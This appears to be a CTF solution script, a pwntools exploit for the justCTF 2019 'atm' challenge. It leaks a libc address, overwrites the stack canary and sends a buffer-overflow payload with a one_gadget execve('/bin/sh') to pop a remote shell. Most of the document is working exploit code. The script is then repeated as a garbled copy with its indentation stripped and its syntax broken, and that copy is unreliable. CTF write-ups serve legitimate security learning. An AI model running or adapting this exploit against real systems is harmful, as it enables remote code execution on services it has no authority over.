disconnect3d/justctf2019_pwn_atm_exploit.py

## justctf2019_pwn_atm_exploit.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *

if args.LOCAL:
    if not args.DBGBIN:
        exe = context.binary = ELF('../private/binary/atm')
    else:
        exe = context.binary = ELF('../private/binary/atm_debug')

context.terminal = ['tmux', 'splitw', '-h']

host = args.HOST or 'localhost'
port = int(args.PORT or 1337)

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    p = connect(host, port)
    if args.GDB:
        gdb.attach(p, gdbscript=gdbscript)
    return p

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())
if args.DBGBIN:
    gdbscript = '''
breakrva send_req
continue
'''

p = start()

def send_raw_req(data, pin=False):
    assert 0x20000 <= len(data) <= 0x30000

    p.recvuntil("Menu: save request (1), send saved request (2), print saved request (3)\n")
    p.sendline('1')
    p.recvuntil('Length: ')
    p.sendline(str(len(data)))
    p.recvuntil('Please provide request data: \n')
    p.send(data)
    p.recvuntil("Received request! \n")
    if pin:
        p.recvuntil('Pin masked!')
    p.recvuntil("Request parsed! \n")

def send_req(sendto, maskat='', data=''):
    assert '\n' not in sendto
    assert isinstance(data, str)

    req = ''.join((
        "ATM-REQ/1.0\n",
        "atm-ip: %s\n" % sendto,
        ("mask-pin-at: %d\n" % maskat) if maskat != '' else '',
        "%s" % data
    ))
    req += 'a' * (0x20000 - len(req)) # Fill rest data

    send_raw_req(req, pin=str(maskat) != '')

def print_req():
    p.recvuntil("Menu: save request (1), send saved request (2), print saved request (3)\n")
    p.sendline('3')
    p.recvuntil('PIN: ')
    pin = int(p.recvuntil('\n', drop=True), 16)
    print("PIN = 0x%x" % pin)
    return pin

#
# From debugging the program, when send_req('1.1.1.1', 123)
#
#pwndbg> set $buf=0x7fd4928e0010
#pwndbg> x/8xb $buf - 0xb028
#0x7fd4928d4fe8: 0x5a    0xf7    0xd5    0x91    0xd4    0x7f    0x00    0x00
#pwndbg> telescope $buf-0xb028 1
#00:0000│   0x7fd4928d4fe8 —▸ 0x7fd491d5f75a ◂— insb   byte ptr [rdi], dx /* 'ld-linux-x86-64.so.2' */
#pwndbg> vmmap 0x7fd491d5f75a
#LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
#    0x7fd491d48000     0x7fd491f2f000 r-xp   1e7000 0      /lib/x86_64-linux-gnu/libc-2.27.so

#
# Note: while we don't know the memory layout/environment run on the server
# it is posssible to get it or find it.
# First of all, the libc we got is from ubuntu:18.04 docker image, so we could try that
# and compare offsets for given allocations (and we would find out they match, so we could debug on that).
# But if we don't do that, we can still leak 8B on each connection for a given offset from the initial buffer.
# That ofc would require us to match the first allocation's offset with the second (or actually third) one,
# but it is doable.
#
# Then we could leeak values on given offsets using many connections and find out offsets for canary and libc addresses.
#
# This exploit doesn't leak that and just 'knows' the offsets.
#
#
#
# Leak 4 bytes from libc address
# Note that this address looks like this:
# 0x 00 00 7f LL EE AA KK xx
# Where we know the 'xx' (from debugging above)
# And it seems we can safeuly assume that the address starts with '7f'
# OR SOMETHING AROUND IT!
#
# When debugging we can find this address is changed to:
# 0x 00 00 7f 2a 2a 2a 2a b0
# (but it does not matter in this case)

# Our buffer got allocated on 0x7fff1ba45010
# and there is a libc address on 0x25dd8 offset from it
#
#│pwndbg> telescope 0x7fff1ba45010+0x25dd8 1
#│00:0000_   0x7fff1ba6ade8 __ 0x7fff1aebe1b0 __ xchg   eax, edx
#│pwndbg> vmmap 0x7eff1aebe1b0
#│LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
#│    0x7fff1aeb8000     0x7fff1b09f000 r-xp   1e7000 0      /lib/x86_64-linux-gnu/libc-2.27.so
#│pwndbg> x/8xb 0x7fff1ba6ade8
#│0x7fff1ba6ade8: 0xb0    0xe1    0xeb    0x1a    0xff    0x7f    0x00    0x00
send_req('1.1.1.1', 0x25dd8+1)

send_req('2.2.2.2')
val = print_req()
libcx = 0x7f00000000b0 + (val<<8)
libc_base = libcx - 0x61b0

print("val                  = 0x%x" % val)
print("libc X address       = 0x%x" % libcx)
print("libc base address    = 0x%x" % libc_base)

# One gadgets for the given libc:
"""
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
"""
one_gadget = p64(libc_base + 0x4f2c5)

# Overwrite global canary with 0x2a2a2a2a........
send_req('3.3.3.3', 0x65d98)

# Overwrite global canary with 0x........2a2a2a2a
# and save a BOF payload with one gadget
send_req('4.4.4.4 ' + 'a'*48 + '*'*8 + 'b'*24 + one_gadget, 0x86d9c)

# Trigger bof payload and so /bin/sh
p.sendline('2')

p.interactive()
	#!/usr/bin/env python2
	# -- coding: utf-8 --
	from pwn import *

	if args.LOCAL:
	if not args.DBGBIN:
	exe = context.binary = ELF('../private/binary/atm')
	else:
	exe = context.binary = ELF('../private/binary/atm_debug')

	context.terminal = ['tmux', 'splitw', '-h']

	host = args.HOST or 'localhost'
	port = int(args.PORT or 1337)

	def local(argv=[], a, *kw):
	'''Execute the target binary locally'''
	if args.GDB:
	return gdb.debug([exe.path] + argv, gdbscript=gdbscript, a, *kw)
	else:
	return process([exe.path] + argv, a, *kw)

	def remote(argv=[], a, *kw):
	'''Connect to the process on the remote host'''
	p = connect(host, port)
	if args.GDB:
	gdb.attach(p, gdbscript=gdbscript)
	return p

	def start(argv=[], a, *kw):
	'''Start the exploit against the target.'''
	if args.LOCAL:
	return local(argv, a, *kw)
	else:
	return remote(argv, a, *kw)

	# Specify your GDB script here for debugging
	# GDB will be launched if the exploit is run via e.g.
	# ./exploit.py GDB
	gdbscript = '''
	continue
	'''.format(**locals())
	if args.DBGBIN:
	gdbscript = '''
	breakrva send_req
	continue
	'''

	p = start()

	def send_raw_req(data, pin=False):
	assert 0x20000 <= len(data) <= 0x30000

	p.recvuntil("Menu: save request (1), send saved request (2), print saved request (3)\n")
	p.sendline('1')
	p.recvuntil('Length: ')
	p.sendline(str(len(data)))
	p.recvuntil('Please provide request data: \n')
	p.send(data)
	p.recvuntil("Received request! \n")
	if pin:
	p.recvuntil('Pin masked!')
	p.recvuntil("Request parsed! \n")

	def send_req(sendto, maskat='', data=''):
	assert '\n' not in sendto
	assert isinstance(data, str)

	req = ''.join((
	"ATM-REQ/1.0\n",
	"atm-ip: %s\n" % sendto,
	("mask-pin-at: %d\n" % maskat) if maskat != '' else '',
	"%s" % data
	))
	req += 'a' * (0x20000 - len(req)) # Fill rest data

	send_raw_req(req, pin=str(maskat) != '')

	def print_req():
	p.recvuntil("Menu: save request (1), send saved request (2), print saved request (3)\n")
	p.sendline('3')
	p.recvuntil('PIN: ')
	pin = int(p.recvuntil('\n', drop=True), 16)
	print("PIN = 0x%x" % pin)
	return pin

	#
	# From debugging the program, when send_req('1.1.1.1', 123)
	#
	#pwndbg> set $buf=0x7fd4928e0010
	#pwndbg> x/8xb $buf - 0xb028
	#0x7fd4928d4fe8: 0x5a 0xf7 0xd5 0x91 0xd4 0x7f 0x00 0x00
	#pwndbg> telescope $buf-0xb028 1
	#00:0000│ 0x7fd4928d4fe8 —▸ 0x7fd491d5f75a ◂— insb byte ptr [rdi], dx /* 'ld-linux-x86-64.so.2' */
	#pwndbg> vmmap 0x7fd491d5f75a
	#LEGEND: STACK \| HEAP \| CODE \| DATA \| RWX \| RODATA
	# 0x7fd491d48000 0x7fd491f2f000 r-xp 1e7000 0 /lib/x86_64-linux-gnu/libc-2.27.so

	#
	# Note: while we don't know the memory layout/environment run on the server
	# it is posssible to get it or find it.
	# First of all, the libc we got is from ubuntu:18.04 docker image, so we could try that
	# and compare offsets for given allocations (and we would find out they match, so we could debug on that).
	# But if we don't do that, we can still leak 8B on each connection for a given offset from the initial buffer.
	# That ofc would require us to match the first allocation's offset with the second (or actually third) one,
	# but it is doable.
	#
	# Then we could leeak values on given offsets using many connections and find out offsets for canary and libc addresses.
	#
	# This exploit doesn't leak that and just 'knows' the offsets.
	#
	#
	#
	# Leak 4 bytes from libc address
	# Note that this address looks like this:
	# 0x 00 00 7f LL EE AA KK xx
	# Where we know the 'xx' (from debugging above)
	# And it seems we can safeuly assume that the address starts with '7f'
	# OR SOMETHING AROUND IT!
	#
	# When debugging we can find this address is changed to:
	# 0x 00 00 7f 2a 2a 2a 2a b0
	# (but it does not matter in this case)

	# Our buffer got allocated on 0x7fff1ba45010
	# and there is a libc address on 0x25dd8 offset from it
	#
	#│pwndbg> telescope 0x7fff1ba45010+0x25dd8 1
	#│00:0000_ 0x7fff1ba6ade8 __ 0x7fff1aebe1b0 __ xchg eax, edx
	#│pwndbg> vmmap 0x7eff1aebe1b0
	#│LEGEND: STACK \| HEAP \| CODE \| DATA \| RWX \| RODATA
	#│ 0x7fff1aeb8000 0x7fff1b09f000 r-xp 1e7000 0 /lib/x86_64-linux-gnu/libc-2.27.so
	#│pwndbg> x/8xb 0x7fff1ba6ade8
	#│0x7fff1ba6ade8: 0xb0 0xe1 0xeb 0x1a 0xff 0x7f 0x00 0x00
	send_req('1.1.1.1', 0x25dd8+1)

	send_req('2.2.2.2')
	val = print_req()
	libcx = 0x7f00000000b0 + (val<<8)
	libc_base = libcx - 0x61b0

	print("val = 0x%x" % val)
	print("libc X address = 0x%x" % libcx)
	print("libc base address = 0x%x" % libc_base)

	# One gadgets for the given libc:
	"""
	0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
	constraints:
	rcx == NULL

	0x4f322 execve("/bin/sh", rsp+0x40, environ)
	constraints:
	[rsp+0x40] == NULL

	0x10a38c execve("/bin/sh", rsp+0x70, environ)
	constraints:
	[rsp+0x70] == NULL
	"""
	one_gadget = p64(libc_base + 0x4f2c5)

	# Overwrite global canary with 0x2a2a2a2a........
	send_req('3.3.3.3', 0x65d98)

	# Overwrite global canary with 0x........2a2a2a2a
	# and save a BOF payload with one gadget
	send_req('4.4.4.4 ' + 'a'48 + ''8 + 'b'24 + one_gadget, 0x86d9c)

	# Trigger bof payload and so /bin/sh
	p.sendline('2')

	p.interactive()